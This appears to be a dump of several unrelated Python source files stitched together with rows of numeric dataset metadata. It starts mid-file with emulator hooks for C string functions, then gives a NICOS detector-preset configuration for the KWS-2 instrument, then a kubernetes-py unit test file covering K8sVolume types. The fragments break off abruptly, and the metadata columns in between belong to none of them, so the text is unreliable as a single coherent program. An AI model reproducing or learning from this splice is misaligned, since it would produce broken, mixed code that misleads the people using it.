eh.writeEmuMem(argv[0], s.lower().encode("latin1"))
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _struprHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuString(argv[0]).decode("latin1")
eh.writeEmuMem(argv[0], s.upper().encode("latin1"))
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcslwrHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuWideString(argv[0]).decode("utf-16le")
eh.writeEmuMem(argv[0], s.lower().encode("utf-16le"))
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsuprHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuWideString(argv[0]).decode("utf-16le")
eh.writeEmuMem(argv[0], s.upper().encode("utf-16le"))
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _strdupHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuString(argv[0])
memAddr = eh.allocEmuMem(len(s) + 1)
eh.writeEmuMem(memAddr, s)
eh.uc.reg_write(eh.regs["ret"], memAddr)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsdupHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuWideString(argv[0])
memAddr = eh.allocEmuMem(len(s) + 2)
eh.writeEmuMem(memAddr, s)
eh.uc.reg_write(eh.regs["ret"], memAddr)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _modHook(eh, address, argv, funcName, userData):
eh.uc.reg_write(eh.regs["ret"], argv[0] % argv[1])
| 40.422497
| 103
| 0.582191
| 3,724
| 29,468
| 4.551826
| 0.053706
| 0.043655
| 0.040057
| 0.068669
| 0.915167
| 0.894814
| 0.875288
| 0.857884
| 0.836588
| 0.818595
| 0
| 0.028109
| 0.274433
| 29,468
| 729
| 104
| 40.422497
| 0.764698
| 0.008212
| 0
| 0.758242
| 0
| 0
| 0.069245
| 0
| 0
| 0
| 0.015162
| 0
| 0
| 1
| 0.083203
| false
| 0
| 0.00157
| 0
| 0.145997
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67076f22bfb35cff7254b91a7f8ef5ebe6135686
| 8,674
|
py
|
Python
|
nicos_mlz/kws2/setups/config_detector.py
|
jkrueger1/nicos
|
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12
|
2019-11-06T15:40:36.000Z
|
2022-01-01T16:23:00.000Z
|
nicos_mlz/kws2/setups/config_detector.py
|
jkrueger1/nicos
|
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91
|
2020-08-18T09:20:26.000Z
|
2022-02-01T11:07:14.000Z
|
nicos_mlz/kws2/setups/config_detector.py
|
jkrueger1/nicos
|
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6
|
2020-01-11T10:52:30.000Z
|
2022-02-25T12:35:23.000Z
|
description = 'presets for the detector position'
group = 'configdata'
# Assigns presets for the detector z position and x/y displacement of the
# beamstop for each selector preset.
#
# When you add a new detector z position, make sure to add a real offset as
# well in the DETECTOR_OFFSETS table below.
DETECTOR_PRESETS = {
'2.9A tilt': {
'1.5m': dict(z=1.5, x=1.0, y=520.0),
'1.5m DB': dict(z=1.5, x=2.0, y=500.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
# '2m DB': dict(z=2, x=13.0, y=500.0, attenuator='in'),
'4m': dict(z=4, x=3.0, y=521.5),
'8m': dict(z=8, x=2.5, y=520.5),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '20m DB': dict(z=19.9, x=13.0, y=500.0, attenuator='in'),
# '20m': dict(z=19.9, x=21.0, y=586.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
},
# '3.95A tilt': {
# '1.5m': dict(z=1.5, x=18.8, y=596.8),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=19.5, y=597.5),
# '6m': dict(z=6, x=16.0, y=603.6),
# '8m': dict(z=8, x=21.5, y=594.0),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m att': dict(z=8, x=13.0, y=500.0),
# '20m': dict(z=19.9, x=20.0, y=586.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'4.66A': {
'1.5m': dict(z=1.5, x=1.0, y=520),
'1.5m DB': dict(z=1.5, x=2.0, y=500.0, attenuator='in'),
'2m': dict(z=2, x=1, y=521.5),
'4m': dict(z=4, x=3, y=521.5),
'8m DB': dict(z=8, x=3.0, y=500.0, attenuator='in'),
'8m': dict(z=8, x=2.5, y=520.5),
'14m': dict(z=14, x=3.0, y=517),
'20m': dict(z=19.9, x=3.0, y=513.5),
'Small': dict(det='small', x=0.0, y=711.4),
##########################################################################
############################# ACHTUNG ####################################
# New beamstop values measured on 03.05.2017 for 2, 4, 8, and 20m at 5 A
# wavelength
##########################################################################
##########################################################################
},
# '4.66A tilt': {
# '1.5m': dict(z=1.5, x=18.8, y=596.8),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=19.5, y=597.5),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m': dict(z=8, x=17.0, y=621),
# '20m': dict(z=19.9, x=20.0, y=586.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'5A': {
'1.5m': dict(z=1.5, x=1.0, y=520),
'1.5m DB': dict(z=1.5, x=2.0, y=620.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
'4m': dict(z=4, x=3, y=521.5),
# '6m': dict(z=6, x=16.0, y=603.6),
'8m': dict(z=8, x=1.5, y=520.5),
#x=21.5, y=594.0),
'8m DB': dict(z=8, x=2.0, y=620.0, attenuator='in'),
# '8m att': dict(z=8, x=13.0, y=500.0),
'20m': dict(z=19.9, x=3.0, y=512),
# '20ms': dict(z=19.9, x=21.0, y=400.0),
'20m DB': dict(z=19.9, x=2.0, y=620.0, attenuator='in'),
'Small': dict(det='small', x=0.0, y=711.4),
},
'5A tilt': {
'1.5m': dict(z=1.5, x=19.0, y=596.5),
'2m': dict(z=2, x=1.0, y=521.5),
'2m DB': dict(z=2, x=13.0, y=500.0, attenuator='in'),
'4m': dict(z=4, x=13.7, y=617.0),
'6m': dict(z=6, x=16.0, y=603.6),
'8m': dict(z=8, x=1.5, y=520.5),
'8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
'8m att': dict(z=8, x=13.0, y=500.0),
'20m': dict(z=19.9, x=3.0, y=512.0),
'Small': dict(det='small', x=0.0, y=711.4),
},
# '6A tilt': {
# '1.5m': dict(z=1.5, x=19.0, y=596.5),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=19.5, y=597.5),
# '6m': dict(z=6, x=16.0, y=603.6),
# '8m': dict(z=8, x=21.5, y=594.0),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m att': dict(z=8, x=13.0, y=500.0),
# '20m': dict(z=19.9, x=20.0, y=586.5),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
# '6A': {
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=13.0, y=597.8),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'7A': {
'1.5m': dict(z=1.5, x=1.0, y=520.5),
'1.5m DB': dict(z=1.5, x=1.0, y=500.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
# '2m DB': dict(z=2, x=16.9, y=500.0, attenuator='in'),
'4m': dict(z=4, x=2.5, y=521.0),
'8m': dict(z=8, x=1.5, y=520.5),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
'8m DB': dict(z=8, x=1.5, y=300.0, attenuator='in'),
'20m DB': dict(z=19.9, x=1.0, y=300.0, attenuator='in'),
'20m': dict(z=19.9, x=1.0, y=507.5),
'Small': dict(det='small', x=-40.0, y=785.0),
},
'7A tilt': {
'1.5m': dict(z=1.5, x=18.8, y=596.8),
'1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
'2m': dict(z=2, x=18.8, y=597.9),
'2m DB': dict(z=2, x=16.9, y=500.0, attenuator='in'),
'4m': dict(z=4, x=20.3, y=597.5),
'8m': dict(z=8, x=20.9, y=592.5),
'8m DB': dict(z=8, x=20.9, y=500.0, attenuator='in'),
'20m': dict(z=19.9, x=15.0, y=581.2),
'Small': dict(det='small', x=-40.0, y=785),
},
# '8A': {
# '1.5m': dict(z=1.5, x=18.8, y=500.0),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m': dict(z=8, x=2.5, y=610.0),
# '20m': dict(z=19.9, x=1.0, y=610.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
# '9A': {
# '1.5m': dict(z=1.5, x=18.8, y=500.0),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=16.3, y=604.0),
# '8m DB': dict(z=8 , x=13.0, y=500.0, attenuator='in'),
# 'Small': dict(det='small', x=0.0, y=711.4),
# only 8m and 20 m have been updated at lambda = 10 A
# },
'10A': {
'1.5m': dict(z=1.5, x=1.0, y=521.0),
'1.5m DB': dict(z=1.5, x=1.0, y=521.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
'4m': dict(z=4, x=1.5, y=519.0),
'8m': dict(z=8, x=3.0, y=516.0),
'8m DB': dict(z=8, x=4.0, y=620.0, attenuator='in'),
'20m': dict(z=19.9, x=4.0, y=493.5),
'20m DB': dict(z=19.9, x=4.0, y=300.0),
'Small': dict(det='small', x=0.0, y=711.4),
},
# '11.3A': {
# '2m': dict(z=2, x=18.8, y=597.8),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '4m': dict(z=4, x=16.3, y=604.0),
# '8m': dict(z=8, x=16.3, y=600.0),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '20m': dict(z=19.9, x=21.5, y=567.2),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'19A': {
'2m': dict(z=2, x=1.0, y=597.8),
'20m': dict(z=19.9, x=1.0, y=620.0),
'8m': dict(z=8, x=1.0, y=500.0),
'Small': dict(det='small', x=0.0, y=711.4),
},
}
SMALL_DET_POSITION = 17.0
# This offset is added to 20m + det_z to get the chopper-detector length
# for time-of-flight mode calculation.
#
# It varies with detector distance because the det_z value is not actually
# particularly accurate.
DETECTOR_OFFSETS = {
1.5: 0.7,
2: 0.7,
2.1: 0.7,
4: 0.7,
4.1: 0.7,
6: 0.7,
8: 0.7,
8.1: 0.7,
14: 0.7,
17.0: 0.7, # for small detector
19.9: 0.7,
}
| 43.808081
| 75
| 0.404888
| 1,625
| 8,674
| 2.156923
| 0.089231
| 0.158345
| 0.071897
| 0.065906
| 0.782311
| 0.782311
| 0.77204
| 0.742368
| 0.724394
| 0.681598
| 0
| 0.209177
| 0.316578
| 8,674
| 197
| 76
| 44.030457
| 0.382085
| 0.482476
| 0
| 0.214286
| 0
| 0
| 0.094647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6711785f890fbe18b6c11ee453a0d098fee791ae
| 35,288
|
py
|
Python
|
tests/test_k8s_volume.py
|
Unacademy/kubernetes-py
|
ad6150c2e27369590dc7a7330fe296bc45755cff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_k8s_volume.py
|
Unacademy/kubernetes-py
|
ad6150c2e27369590dc7a7330fe296bc45755cff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_k8s_volume.py
|
Unacademy/kubernetes-py
|
ad6150c2e27369590dc7a7330fe296bc45755cff
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.md', which is part of this source code package.
#
import uuid
from tests import _utils
from tests.BaseTest import BaseTest
from kubernetes_py.K8sExceptions import TimedOutException
from kubernetes_py.K8sPod import K8sPod
from kubernetes_py.K8sReplicationController import K8sReplicationController
from kubernetes_py.K8sVolume import K8sVolume
from kubernetes_py.K8sVolumeMount import K8sVolumeMount
from kubernetes_py.models.v1.AWSElasticBlockStoreVolumeSource import AWSElasticBlockStoreVolumeSource
from kubernetes_py.models.v1.EmptyDirVolumeSource import EmptyDirVolumeSource
from kubernetes_py.models.v1.GCEPersistentDiskVolumeSource import GCEPersistentDiskVolumeSource
from kubernetes_py.models.v1.GitRepoVolumeSource import GitRepoVolumeSource
from kubernetes_py.models.v1.HostPathVolumeSource import HostPathVolumeSource
from kubernetes_py.models.v1.NFSVolumeSource import NFSVolumeSource
from kubernetes_py.models.v1.SecretVolumeSource import SecretVolumeSource
from kubernetes_py.models.v1.ConfigMapVolumeSource import ConfigMapVolumeSource
class K8sVolumeTest(BaseTest):
def setUp(self):
_utils.cleanup_nodes()
_utils.cleanup_rc()
_utils.cleanup_pods()
_utils.cleanup_secrets()
K8sPod.POD_READY_TIMEOUT_SECONDS = 40
K8sReplicationController.SCALE_WAIT_TIMEOUT_SECONDS = 40
pass
def tearDown(self):
_utils.cleanup_nodes()
_utils.cleanup_rc()
_utils.cleanup_pods()
_utils.cleanup_secrets()
pass
# --------------------------------------------------------------------------------- init
def test_init_no_args(self):
with self.assertRaises(SyntaxError):
K8sVolume()
def test_init_invalid_name(self):
name = object()
with self.assertRaises(SyntaxError):
K8sVolume(name=name)
def test_init_invalid_type(self):
name = "yoname"
type = object()
with self.assertRaises(SyntaxError):
K8sVolume(name=name, type=type)
# --------------------------------------------------------------------------------- emptyDir
def test_init_empty_dir(self):
name = "yoname"
type = 'emptyDir'
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, EmptyDirVolumeSource)
def test_emptydir_set_medium_invalid_type(self):
name = "yoname"
type = "hostPath"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.medium = None
def test_emptydir_set_medium_invalid(self):
name = "yoname"
type = "emptyDir"
medium = "yomedium"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.medium = medium
def test_emptydir_set_medium_none(self):
name = "yoname"
type = "emptyDir"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.medium = None
def test_emptydir_set_medium_emptystring(self):
name = "yoname"
type = "emptyDir"
vol = K8sVolume(name=name, type=type)
vol.medium = ''
self.assertEqual('', vol.medium)
def test_emptydir_set_medium_memory(self):
name = "yoname"
type = "emptyDir"
medium = "Memory"
vol = K8sVolume(name=name, type=type)
vol.medium = medium
self.assertEqual(medium, vol.medium)
# --------------------------------------------------------------------------------- hostPath
def test_init_host_path(self):
name = "yoname"
type = 'hostPath'
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual('hostPath', vol.type)
self.assertIsInstance(vol.source, HostPathVolumeSource)
def test_hostpath_set_path_invalid_type(self):
name = "yoname"
type = "emptyDir"
host_path = "/path/on/host"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.path = host_path
def test_hostpath_set_path_none(self):
name = "yoname"
type = "hostPath"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.path = None
def test_hostpath_set_path(self):
name = "yoname"
type = "hostPath"
host_path = "/path/on/host"
vol = K8sVolume(name=name, type=type)
vol.path = host_path
self.assertEqual(host_path, vol.path)
# --------------------------------------------------------------------------------- secret
def test_init_secret(self):
name = "yoname"
type = "secret"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, SecretVolumeSource)
def test_secret_set_name_invalid_type(self):
name = "yoname"
type = "emptyDir"
secret_name = "yosecret"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.secret_name = secret_name
def test_secret_set_name_invalid_obj(self):
name = "yoname"
type = "secret"
secret = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.secret_name = secret
def test_secret_set_name(self):
name = "yoname"
type = "secret"
secret_name = "yosecret"
vol = K8sVolume(name=name, type=type)
vol.secret_name = secret_name
self.assertEqual(vol.secret_name, secret_name)
# --------------------------------------------------------------------------------- configMap
def test_init_config_map(self):
name = "yoname"
type = 'configMap'
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual('configMap', vol.type)
self.assertIsInstance(vol.source, ConfigMapVolumeSource)
def test_configmap_set_items(self):
name = "yoname"
type = "configMap"
items = list()
items.append({
"key": "testkey",
"path": "testpath"
})
vol = K8sVolume(name=name, type=type)
vol.configmap_items = items
serialized_items = vol.serialize().get('configMap').get('items')
self.assertEqual(items, serialized_items)
# --------------------------------------------------------------------------------- awsElasticBlockStore
def test_aws_init(self):
name = "yoname"
type = "awsElasticBlockStore"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, AWSElasticBlockStoreVolumeSource)
def test_aws_set_volume_id_invalid_obj(self):
name = "yoname"
type = "awsElasticBlockStore"
volume_id = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.volume_id = volume_id
def test_aws_set_volume_id_none(self):
name = "yoname"
type = "awsElasticBlockStore"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.volume_id = None
def test_aws_set_volume_id_invalid_type(self):
name = "yoname"
type = "emptyDir"
volume_id = "vol-0a89c9040d544a371"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.volume_id = volume_id
def test_aws_set_volume_id(self):
name = "yoname"
type = "awsElasticBlockStore"
volume_id = "vol-0a89c9040d544a371"
vol = K8sVolume(name=name, type=type)
vol.volume_id = volume_id
self.assertEqual(vol.volume_id, volume_id)
# --------------------------------------------------------------------------------- gcePersistentDisk
def test_gce_init(self):
name = "yoname"
type = "gcePersistentDisk"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, GCEPersistentDiskVolumeSource)
def test_gce_set_pd_name_none(self):
name = "yoname"
type = "gcePersistentDisk"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.pd_name = None
def test_gce_set_pd_name_invalid_obj(self):
name = "yoname"
type = "gcePersistentDisk"
pd_name = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.pd_name = pd_name
def test_gce_set_pd_name_invalid_type(self):
name = "yoname"
type = "emptyDir"
pd_name = "yopdname"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.pd_name = pd_name
def test_gce_set_pd_name(self):
name = "yoname"
type = "gcePersistentDisk"
pd_name = "vol-0a89c9040d544a371"
vol = K8sVolume(name=name, type=type)
vol.pd_name = pd_name
self.assertEqual(vol.pd_name, pd_name)
# --------------------------------------------------------------------------------- AWS & GCE - fs_type
def test_aws_set_fs_type_none(self):
name = "yoname"
type = "awsElasticBlockStore"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = None
def test_gce_set_fs_type_none(self):
name = "yoname"
type = "gcePersistentDisk"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = None
def test_aws_fs_type_invalid_obj(self):
name = "yoname"
type = "awsElasticBlockStore"
fs_type = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = fs_type
def test_gce_fs_type_invalid_obj(self):
name = "yoname"
type = "gcePersistentDisk"
fs_type = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = fs_type
def test_fs_type_invalid_type(self):
name = "yoname"
type = "emptyDir"
fs_type = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.fs_type = fs_type
def test_aws_set_fs_type(self):
name = "yoname"
type = "awsElasticBlockStore"
fs_type = "xfs"
vol = K8sVolume(name=name, type=type)
vol.fs_type = fs_type
self.assertEqual(vol.fs_type, fs_type)
def test_gce_set_fs_type(self):
name = "yoname"
type = "gcePersistentDisk"
fs_type = "xfs"
vol = K8sVolume(name=name, type=type)
vol.fs_type = fs_type
self.assertEqual(vol.fs_type, fs_type)
# --------------------------------------------------------------------------------- nfs
def test_nfs_init(self):
name = "yoname"
type = "nfs"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, NFSVolumeSource)
def test_nfs_set_server_none(self):
name = "yoname"
type = "nfs"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.nfs_server = None
def test_nfs_set_server_invalid(self):
name = "yoname"
type = "nfs"
server = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.nfs_server = server
def test_nfs_set_server_invalid_type(self):
name = "yoname"
type = "emptyDir"
server = "nfs.company.com"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.nfs_server = server
def test_nfs_set_server(self):
name = "yoname"
type = "nfs"
server = "nfs.company.com"
vol = K8sVolume(name=name, type=type)
vol.nfs_server = server
self.assertEqual(vol.nfs_server, server)
# --------------------------------------------------------------------------------- repository (gitRepo)
def test_git_repo_init(self):
name = "yoname"
type = "gitRepo"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, GitRepoVolumeSource)
def test_git_repo_set_repo_none(self):
name = "yoname"
type = "gitRepo"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_repository = None
def test_git_repo_set_repo_invalid(self):
name = "yoname"
type = "gitRepo"
repo = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_repository = repo
def test_git_set_repo_invalid_type(self):
name = "yoname"
type = "emptyDir"
repo = "git@somewhere:me/my-git-repository.git"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.git_repository = repo
def test_git_set_repo(self):
name = "yoname"
type = "gitRepo"
repo = "git@somewhere:me/my-git-repository.git"
vol = K8sVolume(name=name, type=type)
vol.git_repository = repo
self.assertEqual(vol.git_repository, repo)
# --------------------------------------------------------------------------------- revision (gitRepo)
def test_git_set_revision_none(self):
name = "yoname"
type = "gitRepo"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_revision = None
def test_git_set_revision_invalid(self):
name = "yoname"
type = "gitRepo"
rev = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_revision = rev
def test_git_set_revision_invalid_type(self):
name = "yoname"
type = "emptyDir"
rev = "22f1d8406d464b0c0874075539c1f2e96c253775"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.git_revision = rev
def test_git_set_revision(self):
name = "yoname"
type = "gitRepo"
rev = "22f1d8406d464b0c0874075539c1f2e96c253775"
vol = K8sVolume(name=name, type=type)
vol.git_revision = rev
self.assertEqual(vol.git_revision, rev)
# --------------------------------------------------------------------------------- api - pod - emptydir
def test_pod_emptydir(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "emptydir"
vol_type = "emptyDir"
volume = _utils.create_volume(name=vol_name, type=vol_type)
mount_name = vol_name
mount_path = '/test-emptydir'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx"
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - pod - hostpath
def test_pod_hostpath(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "hostpath"
vol_type = "hostPath"
host_path = "/var/lib/docker"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.path = host_path
mount_name = vol_name
mount_path = '/test-hostpath'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx"
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - pod - secret
def test_pod_secret(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
secret_name = "yosecret"
secret = _utils.create_secret(name=secret_name)
k = ".secret-file"
v = "dmFsdWUtMg0KDQo="
secret.data = {k: v}
vol_name = "secret"
vol_type = "secret"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.secret_name = secret_name
mount_name = vol_name
mount_path = '/test-secret'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx"
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
secret.create()
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - pod - aws ebs
def test_pod_aws_ebs(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
volume_id = "vol-0e3056a2"
vol_name = "ebs"
vol_type = "awsElasticBlockStore"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.volume_id = volume_id
mount_name = vol_name
mount_path = '/test-aws'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - pod - gce pd
def test_pod_gce_pd(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
pd_name = "kubernetes_py-py-test-pd"
vol_name = "persistent"
vol_type = "gcePersistentDisk"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.pd_name = pd_name
mount_name = vol_name
mount_path = '/test-gce'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - pod - nfs
def test_pod_nfs(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "nfs"
vol_type = "nfs"
server = "howard.mtl.mnubo.com"
nfs_path = "/fs1/test-nfs"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.nfs_server = server
volume.nfs_path = nfs_path
mount_name = vol_name
mount_path = '/test-nfs'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
